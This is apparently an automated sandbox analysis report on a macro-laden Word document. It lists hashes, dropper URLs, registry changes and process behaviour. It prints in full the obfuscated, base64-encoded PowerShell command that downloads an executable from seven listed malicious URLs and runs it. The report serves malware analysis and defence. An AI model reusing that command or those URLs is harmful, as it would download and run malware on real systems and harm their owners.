75bf970f98cfafd5b377938aa46073f7818011dfa98561c7592703fe34dd1c92

Analysis

max time kernel
120s
max time network
120s
platform
windows7_x64
resource
win7-20240220-en
resource tags

arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
submitted
17/05/2024, 18:41

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

50ea96b7c42b908b2821fa832e798db0_JaffaCakes118.doc
Size

220KB
MD5

50ea96b7c42b908b2821fa832e798db0
SHA1

c71acc8715ae12492ab48ff57df6bb998f11f5d7
SHA256

75bf970f98cfafd5b377938aa46073f7818011dfa98561c7592703fe34dd1c92
SHA512

fedd43457cadc7f9950b92e7c66e3e4176ec130c41f09a95e00e7d05ba87d62fe974ab7363ce70a7b17901c12552af98fc8079659141d0f5ee998d33b930653e
SSDEEP

3072:b4tcTvjvTY140818tIP4ovpLSGju9jDW1M+7up3W:EtcnvE140o8tIP4ap8jDjmcW

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://hottco.com/stats/erd/

exe.dropper

http://dutarini.com/cgi-bin/6/

exe.dropper

https://brownshotelgroup.com/www.brownshotelgroup.com.pt/i9/

exe.dropper

http://pastaciyiz.biz/wp-includes/fvx/

exe.dropper

https://dogaltrm.com/components/r6h/

exe.dropper

https://dortislem.net/administrator/c/

exe.dropper

https://onyourleftracing.com/cgi-bin/QcC/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2460	2504	powershell.exe	28

Blocklisted process makes network request 6 IoCs

flow	pid	Process
5	2460	powershell.exe
7	2460	powershell.exe
8	2460	powershell.exe
10	2460	powershell.exe
12	2460	powershell.exe
14	2460	powershell.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Office loads VBA resources, possible macro or embedded object present

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\TypeLib\{379619C2-E5A7-44FC-BE0D-8886CC854738}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\TypeLib\{379619C2-E5A7-44FC-BE0D-8886CC854738}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\TypeLib\{379619C2-E5A7-44FC-BE0D-8886CC854738}\2.0	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\TypeLib	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1740	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2460	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2460	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1740	WINWORD.EXE
1740	WINWORD.EXE

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 1740 wrote to memory of 2332	1740	WINWORD.EXE	33
PID 1740 wrote to memory of 2332	1740	WINWORD.EXE	33
PID 1740 wrote to memory of 2332	1740	WINWORD.EXE	33
PID 1740 wrote to memory of 2332	1740	WINWORD.EXE	33

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\50ea96b7c42b908b2821fa832e798db0_JaffaCakes118.doc"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1740
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2332

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -en JABHAHQAagB0ADYAZwBfAD0AKAAnAFMAcQAnACsAKAAnAHUAegAnACsAJwB6AG4AagAnACkAKQA7ACYAKAAnAG4AZQAnACsAJwB3AC0AaQB0AGUAbQAnACkAIAAkAGUAbgB2ADoAVQBTAEUAcgBwAHIAbwBmAEkAbABlAFwAZQBsAGIAUQA4AEsASABcAEwAcQBNAGYAZQBqADQAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAHIARQBjAFQATwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAYABFAGMAYABVAHIAYABJAFQAWQBwAHIAbwBUAE8AYABjAG8AbAAiACAAPQAgACgAKAAnAHQAbABzACcAKwAnADEAMgAnACkAKwAnACwAJwArACcAIAAnACsAJwB0ACcAKwAoACcAbABzADEAMQAnACsAJwAsACAAJwArACcAdABsACcAKQArACcAcwAnACkAOwAkAFoAYgB0AG8AaABkADcAIAA9ACAAKAAnAFUAJwArACgAJwAxACcAKwAnADgAbQBpAGEAegBxACcAKQApADsAJABDAG0AMwBkAG0AbAAyAD0AKAAnAFIAZQAnACsAKAAnAHkANQAnACsAJwBtADgAJwApACsAJwBhACcAKQA7ACQAVABtAGkANABoAHAAcwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAKAAnAGcARwAnACsAJwB4ACcAKQArACcARQAnACsAJwBsACcAKwAoACcAYgBxADgAJwArACcAawAnACkAKwAoACcAaAAnACsAJwBnAEcAeAAnACkAKwAoACcATABxACcAKwAnAG0AZgBlAGoAJwApACsAKAAnADQAZwAnACsAJwBHAHgAJwApACkAIAAtAHIAZQBQAGwAYQBjAEUAIAAgACgAWwBjAGgAQQBSAF0AMQAwADMAKwBbAGMAaABBAFIAXQA3ADEAKwBbAGMAaABBAFIAXQAxADIAMAApACwAWwBjAGgAQQBSAF0AOQAyACkAKwAkAFoAYgB0AG8AaABkADcAKwAoACgAJwAuACcAKwAnAGUAeAAnACkAKwAnAGUAJwApADsAJABBADEAcQAxAHMAcABkAD0AKAAoACcAUgBuACcAKwAnAHAAbQAnACkAKwAnAHEAdwAnACsAJwBqACcAKQA7ACQARAAxAGUAYQA2AGMAMAA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAbwBiAGoAZQBjAHQAJwApACAATgBlAFQALgBXAEUAQgBDAEwAaQBFAG4AVAA7ACQATABpADcAdQAxAGkAMwA9ACgAKAAnAGgAdAB0AHAAJwArACcAOgAvACcAKwAnAC8AaABvACcAKQArACgAJwB0ACcAKwAnAHQAYwBvACcAKwAnAC4AYwBvAG0ALwAnACkAKwAoACcAcwB0AGEAJwArACcAdABzACcAKQArACgAJwAvAGUAJwArACcAcgBkAC8AJwApACsAJwAqAGgAJwArACcAdAAnACsAKAAnAHQAcAA6ACcAKwAnAC8AJwApACsAJwAvACcAKwAoACcAZAAnACsAJwB1AHQAJwArACcAYQByAGkAbgBpAC4AJwArACcAYwBvAG0ALwBjACcAKQArACcAZwBpACcAKwAoACcALQBiACcAKwAnAGkAbgAnACsAJwAvADYALwAnACsAJwAqAGgAdAAnACsAJwB0AHAAcwA6AC8AJwApACsAKAAnAC8AYgAnACsAJwByAG8AdwBuAHMAJwArACcAaABvAHQAJwApACsAKAAnAGUAJwArACcAbABnAHIAJwApACsAKAAnAG8AdQBwAC4AJwArACcAYwBvACcAKQArACcAbQAnACsAKAAnAC8AJwArACcAdwB3ACcAKwAnAHcALgBiAHIAJwApACsAKAAnAG8AdwBuACcAKwAnAHMAaAAnACkAKwAoACcAbwB0AGUAJwArACcAbABnAHIAJwApACsAJwBvAHUAJwArACgAJwBwAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAuAHAAJwArACgAJwB0ACcAKwAnAC8AaQAnACkAKwAoACcAOQAvACoAaAAnACsAJwB0AHQAcAAnACsAJwA6ACcAKQArACcALwAnACsAJwAvACcAKwAnAHAAJwArACgAJwBhAHMAdAAnACsAJwBhAGMAJwApACsAKAAnAGkAeQBpAHoALgAnACsAJwBiACcAKQArACgAJwBpAHoALwB3AHAAJwArACcALQBpAG4AJwArACcAYwAnACsAJwBsAHUAZABlAHMALwAnACkAKwAoACcAZgB2AHgALwAqAGgAJwArACcAdAB0ACcAKQArACcAcAAnACsAKAAnAHMAOgAvACcAKwAnAC8AJwApACsAKAAnAGQAbwAnACsAJwBnACcAKQArACgAJwBhACcAKwAnAGwAdAAnACkAKwAoACcAcgAnACsAJwBtAC4AYwAnACkAKwAnAG8AJwArACgAJwBtACcAKwAnAC8AYwAnACkAKwAnAG8AJwArACgAJwBtAHAAJwArACcAbwBuACcAKwAnAGUAbgAnACkAKwAoACcAdABzAC8AJwArACcAcgAnACkAKwAoACcANgBoACcAKwAnAC8AKgAnACkAKwAnAGgAdAAnACsAJwB0AHAAJwArACcAcwAnACsAKAAnADoALwAvAGQAJwArACcAbwAnACkAKwAoACcAcgB0AGkAJwArACcAcwAnACkAKwAoACcAbAAnACsAJwBlAG0AJwApACsAKAAnAC4AJwArACcAbgBlAHQALwBhAGQAJwApACsAKAAnAG0AaQAnACsAJwBuAGkAcwB0AHIAYQB0ACcAKwAnAG8AcgAvACcAKwAnAGMALwAnACkAKwAoACcAKgBoACcAKwAnAHQAdAAnACkAKwAnAHAAcwAnACsAKAAnADoALwAvAG8AJwArACcAbgAnACsAJwB5AG8AJwApACsAKAAnAHUAcgBsAGUAJwArACcAZgAnACkAKwAnAHQAJwArACgAJwByAGEAYwAnACsAJwBpACcAKwAnAG4AZwAuAGMAbwAnACkAKwAnAG0ALwAnACsAKAAnAGMAZwBpAC0AYgBpAG4AJwArACcALwBRACcAKwAnAGMAJwArACcAQwAnACkAKwAnAC8AJwApAC4AIgBzAGAAUABsAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFYAbwAyADUAaQA4AG8APQAoACgAJwBWAHEAJwArACcAYQBpAHYAJwApACsAJwA1AHEAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAVAB5AHEAZAB4AGsAcQAgAGkAbgAgACQATABpADcAdQAxAGkAMwApAHsAdAByAHkAewAkAEQAMQBlAGEANgBjADAALgAiAEQATwBXAGAATgBsAE8AQQBkAEYAYABJAEwAZQAiACgAJABUAHkAcQBkAHgAawBxACwAIAAkAFQAbQBpADQAaABwAHMAKQA7ACQAWABhAGgAawBqADEAeAA9ACgAKAAnAEcAdQAnACsAJwBwADAANwAnACkAKwAnAG8AJwArACcANAAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAJwArACcAZQBtACcAKQAgACQAVABtAGkANABoAHAAcwApAC4AIgBsAGAARQBOAEcAVABoACIAIAAtAGcAZQAgADIAMQA1ADkANgApACAAewAuACgAJwBJAG4AdgAnACsAJwBvAGsAJwArACcAZQAtAEkAJwArACcAdABlAG0AJwApACgAJABUAG0AaQA0AGgAcABzACkAOwAkAFcAYQAwAGYAaABlAGQAPQAoACcASQA4ACcAKwAoACcAYwBwADYAeAAnACsAJwA2ACcAKQApADsAYgByAGUAYQBrADsAJABQAHEAcQBvAF8AdgBlAD0AKAAnAEIAJwArACgAJwB2ACcAKwAnAHkAcwBxACcAKQArACcAagBxACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWQBuADEANQByAHgAMQA9ACgAKAAnAEMAOQAnACsAJwA5ACcAKwAnADQAdQBrACcAKQArACcAbwAnACkA
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2460

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

